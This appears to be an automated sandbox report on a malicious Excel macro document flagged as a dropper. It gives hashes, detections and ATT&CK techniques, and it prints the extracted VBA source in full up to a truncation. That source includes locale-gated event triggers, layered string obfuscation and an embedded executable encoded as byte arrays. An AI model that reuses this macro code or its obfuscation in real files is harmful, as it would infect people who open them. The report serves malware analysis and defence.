Office (OLE) malware analysis — malicious · 21cc174826ce5e69

MALICIOUS

Office (OLE)

85.5 KB Created: 2019-02-27 16:46:11 First seen: 2019-03-10

MD5: 6a9eda3eb0bfc222ab46725829faaec7 SHA-1: 1ffceee85ab43487e512a0d980a29eef2e80296d SHA-256: 21cc174826ce5e69aa60445f547b94bb0b544c5d66a01063e37abbfdc91a715f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6872898-0. Static analysis revealed the presence of VBA macros that utilize the Shell() function. This indicates the macro is designed to execute external commands, a common technique for downloading and running additional malicious payloads.

Heuristics 3

ClamAV: Doc.Dropper.Agent-6872898-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6872898-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10875 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10875 bytes
SHA-256: `76466f1662989723fa925801a7015dfe574ebc85c88b6cf8f7bd35ab2f10c3bf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "st1, 1, 0, MSForms, Frame" #If VBA7 Then Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" () Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean #Else Private Declare Function GetUserDefaultLCID% Lib "kernel32" () Private Declare Function GetLocaleInfo Lib "kernel32" Alias _ "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _ ByVal lpLCData As String, ByVal cchData As Long) As Long Private Declare Function SetLocaleInfo Lib "kernel32" Alias _ "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _ ByVal lpLCData As String) As Boolean #End If Private Const LOCALE_ICOUNTRY = &H5 Public intA As Integer Private Const belll = 24 Private Sub st1_Layout() cu = 0 Dim Symbol As String Lot = GetUserDefaultLCID() iRet1 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, _ lpLCDataVar, 0): Symbol = String$(iRet1, 0): iRet2 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, Symbol, iRet1) Pos = InStr(Symbol, Chr$(0)) If Pos > 0 Then Symbol = Left$(Symbol, Pos - 1) End If If Symbol = vbLong * 27 Then intA = 131: ThisWorkbook.vector Else cu = 100 End Sub Private Sub st1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single) If intA <> 131 Then ThisWorkbook.vector End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function Ts() Ts = BackstageGroupStyleWarning - 2 End Function Function Leged() Leged = "oe""f1""""e$""Gu""VG""\S?D`""""(""U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+)(`2xDXUD2+x""i3}[ 23}3 [ih/D2mx)O)-D2.xD2sxD2+x""D]v{]g__B9.92;3.662.5." End Function Function GeneralOptinss() Dim Vrr As String Vrr = "TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`(i3-)[)3}} 2i3/[""h3[i3}} 2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x""i3}[ 23}3 [ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""V]r{_G""^""}$ 45}} 32}^ ""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZG v^0K$bpQXgMqeOoCbfp$^0""""$^4}} 23}^ ""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""""""""""""""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""^""}$ 53}} 24}} 6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmqg""""^}$ 23}^ ""$h/G))s).D\"").+^}$ 32}^ /$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'" GeneralOptinss = Gle(Gle(Ety(Gle(Ety(Vrr, Ts)), Ts))) End Function Function Gle(S As String) As String Dim b() As Byte Dim bb As Byte Dim i As Long b = S For i = 0 To UBound(b) - 2 Step msoBevelSlope bb = b(i) b(i) = b(i + msoblogImageTypeGIF) b(i + msoBulletNumbered) = bb Next i Gle = b End Function Function BoolCounts() BoolCounts = ",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0, ... (truncated)

SHA-256: 76466f1662989723fa925801a7015dfe574ebc85c88b6cf8f7bd35ab2f10c3bf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "st1, 1, 0, MSForms, Frame"

#If VBA7 Then
    Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
    Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
    Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
#Else
    Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
Private Declare Function GetLocaleInfo Lib "kernel32" Alias _
"GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _
ByVal lpLCData As String, ByVal cchData As Long) As Long

Private Declare Function SetLocaleInfo Lib "kernel32" Alias _
"SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, _
ByVal lpLCData As String) As Boolean
#End If



Private Const LOCALE_ICOUNTRY = &H5
Public intA As Integer
Private Const belll = 24













Private Sub st1_Layout()
cu = 0
Dim Symbol As String
Lot = GetUserDefaultLCID()
iRet1 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, _
lpLCDataVar, 0): Symbol = String$(iRet1, 0): iRet2 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, Symbol, iRet1)
Pos = InStr(Symbol, Chr$(0))
If Pos > 0 Then
Symbol = Left$(Symbol, Pos - 1)
End If
If Symbol = vbLong * 27 Then intA = 131: ThisWorkbook.vector Else cu = 100

End Sub

Private Sub st1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
If intA <> 131 Then ThisWorkbook.vector
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Function Ts()
 Ts = BackstageGroupStyleWarning - 2
 End Function

Function Leged()
Leged = "oe""f1""""e$""Gu""VG""\S?D`""""(""*U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+**)*(`2*xDXUD2+x*""i3}[ 23}3 [ih/D2mx)O)-D2.xD2sxD2+x*""D]v{]g__B*9*.92;3.662.5."
End Function

Function GeneralOptinss()
Dim Vrr As String
Vrr = "TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`**(i3-)[)3}}  2i3/[""h3*[i3}}  2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x*""i3}[ 23}3 [ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]*JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe*""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]*JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""*V]r{_G""*^""}$ 45}}  32}^ ""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZG v^0K$bpQXgMqeOoCbfp$^*0""""$^4}}  23}^ ""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""*""""""*""""*""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""*^""}$ 53}}  24}}  6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmq*g""""^*}$ 23}^ ""$h/G))s).D\"").+^*}$ 32}^ /$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'"
GeneralOptinss = Gle(Gle(Ety(Gle(Ety(Vrr, Ts)), Ts)))
End Function

Function Gle(S As String) As String
Dim b() As Byte
Dim bb As Byte
Dim i As Long
b = S
For i = 0 To UBound(b) - 2 Step msoBevelSlope
  bb = b(i)
  b(i) = b(i + msoblogImageTypeGIF)
  b(i + msoBulletNumbered) = bb
Next i
Gle = b
End Function
Function BoolCounts()
BoolCounts = ",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.